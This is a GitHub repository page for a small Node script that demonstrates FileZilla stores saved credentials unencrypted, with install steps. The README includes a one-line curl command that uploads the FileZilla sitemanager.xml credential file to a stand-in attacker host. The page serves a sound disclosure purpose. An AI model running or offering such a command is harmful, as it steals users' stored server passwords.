No description, website, or topics provided.
Branch: master
Clone or download
Fetching latest commit…
Cannot retrieve the latest commit at this time.
Permalink
Type Name Latest commit message Commit time
Failed to load latest commit information.
.gitignore Initial commit May 15, 2016
README.md
index.js
package.json Initial commit May 15, 2016

README.md

Filezilla passwords revealer

Output of the script

This is a small script to demonstrate that the Filezilla credentials are stored unencrypted on the local drive and that any program, malware, or even node module running on your machine can trivially access them.

A single bash command is enough! curl -F "credentials=@~/.filezilla/sitemanager.xml" attacker.com/credentials.php reads the local preference file and uploads it to a remote website.

This script should work with Windows, Linux and Mac. Please open an issue otherwise.

Running

  • Clone this repository
  • npm install
  • node index.js

Or simply copy paste this script in your terminal

git clone https://github.com/christophetd/filezilla-passwords-revealer.git
cd filezilla-passwords-revealer
npm install
node index.js

Disclaimer: copy pasting bash commands in your terminal is a terrible practice security-wise

Resources